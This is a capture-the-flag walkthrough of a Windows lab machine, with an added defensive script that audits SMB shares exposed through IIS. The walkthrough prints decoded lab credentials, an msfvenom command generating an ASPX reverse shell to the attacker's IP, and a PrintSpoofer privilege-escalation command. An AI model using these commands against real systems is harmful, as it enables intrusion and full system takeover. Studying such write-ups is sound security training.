Let’s start with a full port scan with Nmap:
This is why it is good to start off with a full port scan: a number of the open ports fall outside the top 10,000. I will now run a service scan against these ports for further enumeration, also using the common scripts.
Check SMB shares:
Make a directory /mnt/share on the attack machine and mount the share:
On the attack machine, navigate to /mnt/share:
This looks to be base64 encoded, as it ends with ==. Let's decode it:
OK, so we have the user Bob with the password !P@$$W0rD!12
Decoding the next string we have:
User: Bill, Password: Juw4nnaM4n420696969!$$$
We cannot go any further with SMB enumeration; these credentials simply do not work against SMB.
IIS Web Servers:
From the Nmap scan we can see two IIS web servers, one on port 80 and the other on port 49663.
IIS Web Server Port 80:
Here we have the standard landing page, so let's enumerate for hidden directories using Gobuster. After running Gobuster for several minutes no directories show up, so let's move on to port 49663:
Interestingly, the directory found on the SMB server also maps to the website:
10.10.216.112:49663/nt4wrksv
If we navigate to this page and append password.txt to the URL we see the following:
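The overlap above, an SMB share whose directory is also served by IIS, is the misconfiguration a defender wants to catch before anything uploaded over SMB becomes reachable over HTTP. The audit below is an added example, not code from the original writeup; the share and virtual-directory inventories are constructed sample data standing in for what Get-SmbShare and the IIS configuration would return.

```python
from pathlib import PureWindowsPath

# Constructed sample inventory, modelled on the share/web-root overlap seen in the writeup.
# In practice these lists would be populated from Get-SmbShare and the IIS site configuration.
SMB_SHARES = [
    {"name": "nt4wrksv", "path": r"C:\inetpub\wwwroot\nt4wrksv", "writable": True},
    {"name": "Backups", "path": r"D:\Backups", "writable": True},
    {"name": "ReadOnlyDocs", "path": r"C:\inetpub\wwwroot\docs", "writable": False},
]

IIS_VDIRS = [
    {"site": "Default Web Site", "url": "/", "physical": r"C:\inetpub\wwwroot"},
    {"site": "Default Web Site", "url": "/nt4wrksv", "physical": r"C:\inetpub\wwwroot\nt4wrksv"},
]


def _under(child: str, parent: str) -> bool:
    """True if `child` is `parent` or lies beneath it (Windows paths, case-insensitive)."""
    c = PureWindowsPath(child.lower())
    p = PureWindowsPath(parent.lower())
    return c == p or p in c.parents


def find_writable_web_shares(shares, vdirs):
    """Return (share name, site, url) for each writable share that sits inside a served directory.

    A file dropped into such a share is immediately fetchable over HTTP, and IIS will
    execute it if script handlers (for example .aspx) are enabled for that path. When a
    share falls under several virtual directories, the most specific one is reported.
    """
    findings = []
    for share in shares:
        if not share["writable"]:
            continue
        matches = [vd for vd in vdirs if _under(share["path"], vd["physical"])]
        if matches:
            best = max(matches, key=lambda vd: len(vd["physical"]))
            findings.append((share["name"], best["site"], best["url"]))
    return findings


if __name__ == "__main__":
    for name, site, url in find_writable_web_shares(SMB_SHARES, IIS_VDIRS):
        print(f"writable share {name!r} is served by {site} under {url}")
```

Read-only shares and shares outside every web root are ignored, so the only finding on the sample data is the nt4wrksv share exposed under /nt4wrksv.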
Back to SMB: we can try to upload a shell and then browse to it through the website to execute the reverse shell.
To create the shell we will use msfvenom; the command can easily be constructed using the Venom Builder from the following website:
https://pentest.ws/tools/venom-builder
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.6.68 LPORT=4444 --platform windows -a x64 -f aspx -o shell.aspx
Once created, we can upload shell.aspx to the web server using the SMB put command.
Let's set up a Netcat listener on port 444 and try to catch our reverse shell.
We are currently the user iis apppool\defaultapppool.
We can navigate to c:\Users\Bob\Desktop and grab the user.txt file:
Looking at systeminfo:
We can see that we are running MS Windows Server 2016, so it is unlikely that a Rotten Potato exploit would work; however, there is a newer exploit that is known to work against later Windows 10 and Windows Server 2016/2019 releases.
This exploit tool is called PrintSpoofer and can be found at the site below:
https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/
If we have SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, we should be able to exploit the machine and get NT AUTHORITY\SYSTEM.
To do this we need to upload the PrintSpoofer.exe exploit to the /nt4wrksv directory. We can upload the file using the SMB connection we established earlier with smbclient.
Navigating to the c:\inetpub\wwwroot\nt4wrksv directory we can see the file from the SMB share:
We can now run the exploit using the following command:
PrintSpoofer.exe -i -c cmd.exe
We are now nt authority\system and can navigate to the Administrator directory and grab the root.txt flag:
I enjoyed this box as I was not aware of the PrintSpoofer exploit, which is certainly useful for more modern versions of MS Windows where either SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege are enabled.
Thank you to TheMayor for developing this box.